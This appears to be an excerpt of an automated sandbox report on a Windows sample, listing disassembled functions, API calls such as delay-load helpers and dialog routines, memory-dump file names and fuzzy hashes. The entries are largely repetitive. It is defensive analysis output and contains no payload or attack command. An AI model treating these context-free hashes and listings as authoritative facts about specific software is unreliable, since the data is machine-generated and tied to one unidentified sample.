    • Instruction Fuzzy Hash: E5A0019A6A9503BC779862617D16D7B022ECAD4B62370892FF907C8482A8881A596476
    Function 0005F3A9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 23cdcc9e05bc867ab2f240004a016e7fee5a9bc3caf94815c490a8807bef7ec9
    • Instruction ID: 31372f444546e02e1b3a61088f9a6e598b3e4e6aa6fce552a91a70216af2ccb9
    • Opcode Fuzzy Hash: 23cdcc9e05bc867ab2f240004a016e7fee5a9bc3caf94815c490a8807bef7ec9
    • Instruction Fuzzy Hash: E5A0019A6A9503BC779862617D16D7B022ECAD4B62370892FF907C8482A8881A596476
    Function 0005F3C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a9687710e747596f571dc1eea3c932aa2b77d425292e6ec84d4443a22aabefdf
    • Instruction ID: 31372f444546e02e1b3a61088f9a6e598b3e4e6aa6fce552a91a70216af2ccb9
    • Opcode Fuzzy Hash: a9687710e747596f571dc1eea3c932aa2b77d425292e6ec84d4443a22aabefdf
    • Instruction Fuzzy Hash: E5A0019A6A9503BC779862617D16D7B022ECAD4B62370892FF907C8482A8881A596476
    Function 0005F539 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 817f2325c3a5ea743c4209055fe6ea98628680f5f9b23d83d64bc151b60dcc43
    • Instruction ID: e0d0b336947c1359232c95f6e38fa0a0cb9f2c3c5ecf2e68cba6fdffe3ad6a19
    • Opcode Fuzzy Hash: 817f2325c3a5ea743c4209055fe6ea98628680f5f9b23d83d64bc151b60dcc43
    • Instruction Fuzzy Hash: BDA012C11A44033D310429503D02C3B011DC6D0B72330843BF902C40816848080D1031
    Function 0005F554 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: b28859258ee3585167883871a4ea8a19a2c085cdd0f2c83fa9dd2d6bb9afb83f
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: b28859258ee3585167883871a4ea8a19a2c085cdd0f2c83fa9dd2d6bb9afb83f
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    Function 0005F55E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 094f647e9d76e0b3425375f767c7bcd97817694ef77d27a928ce456b2e311b65
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: 094f647e9d76e0b3425375f767c7bcd97817694ef77d27a928ce456b2e311b65
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    Function 0005F57C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 59eb58aa7c6dcf9a676602838cb16ec0fa3e3b8ae9f2a8958f699656a0cfc773
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: 59eb58aa7c6dcf9a676602838cb16ec0fa3e3b8ae9f2a8958f699656a0cfc773
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    Function 0005F586 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 07942b4f0738be4cf903c28cc25c0029f05e8711a8eb30da837b363176b9678f
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: 07942b4f0738be4cf903c28cc25c0029f05e8711a8eb30da837b363176b9678f
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    Function 0005F590 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 686365520fce0adcb7e340f1f44e9ef9ea108c4c1183afbd5f18520bce8f727f
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: 686365520fce0adcb7e340f1f44e9ef9ea108c4c1183afbd5f18520bce8f727f
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    Function 0005F6BD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c321acb29d9c506bd46ce3b8574a3f5b2fda1657535296f00a3e7ad5bfb0c5d8
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: c321acb29d9c506bd46ce3b8574a3f5b2fda1657535296f00a3e7ad5bfb0c5d8
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    Function 0005F6C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: ac11a6024c4aaacf01ac8dd41ed5d1bdbb2850e78820ec180768a25dfbbca504
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: ac11a6024c4aaacf01ac8dd41ed5d1bdbb2850e78820ec180768a25dfbbca504
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    Function 0005F6D1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 4c5069efbd12e489a72dbe3399eadedc3761413c89c16e17f112ff0c41d6e155
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: 4c5069efbd12e489a72dbe3399eadedc3761413c89c16e17f112ff0c41d6e155
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    Function 0005F6DB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6dc8b2f08bbd8cabba2208e80afb58caf45452d981f334328dd01f5b41ac774a
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: 6dc8b2f08bbd8cabba2208e80afb58caf45452d981f334328dd01f5b41ac774a
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    Function 0005F6E5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0760c3aa74cdbe9e888d849e1eaaeaf3a3ef5f37bd82293024a820220debdc3c
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: 0760c3aa74cdbe9e888d849e1eaaeaf3a3ef5f37bd82293024a820220debdc3c
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    Function 0004A880 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(000000FF,?,?,0004A83D,?,?,?,?,?,000737FF,000000FF), ref: 0004A89B
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: a43142930138965c35b576fe4567fd011ec2347cf611772d46d6323b547bddb7
    • Instruction ID: 96775faef5823051542b04e9910c184fc599af247e037aafb7f1d73854a6eeae
    • Opcode Fuzzy Hash: a43142930138965c35b576fe4567fd011ec2347cf611772d46d6323b547bddb7
    • Instruction Fuzzy Hash: AAF0E2B05C2B058FEB308B24C448792B3E4EB13335F041B6EC0E6438E0D774698E8B56

    Non-executed Functions

    Function 0005D410 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0005D4A1
    • EndDialog.USER32(?,00000006), ref: 0005D4B4
    • GetDlgItem.USER32(?,0000006C), ref: 0005D4D0
    • SetFocus.USER32(00000000), ref: 0005D4D7
    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0005D511
    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0005D548
    • FindFirstFileW.KERNEL32(?,?), ref: 0005D55E
      • Part of subcall function 0005BC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC2F
      • Part of subcall function 0005BC1B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0005BC40
      • Part of subcall function 0005BC1B: SystemTimeToFileTime.KERNEL32(?,?), ref: 0005BC4E
      • Part of subcall function 0005BC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC5C
      • Part of subcall function 0005BC1B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005BC77
      • Part of subcall function 0005BC1B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0005BC9E
      • Part of subcall function 0005BC1B: _swprintf.LIBCMT ref: 0005BCC4
    • _swprintf.LIBCMT ref: 0005D5A7
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0005D5BA
    • FindClose.KERNEL32(00000000), ref: 0005D5C1
    • _swprintf.LIBCMT ref: 0005D610
    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0005D623
    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0005D640
    • _swprintf.LIBCMT ref: 0005D673
    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0005D686
    • _swprintf.LIBCMT ref: 0005D6D0
    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0005D6E3
      • Part of subcall function 0005C083: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005C0A9
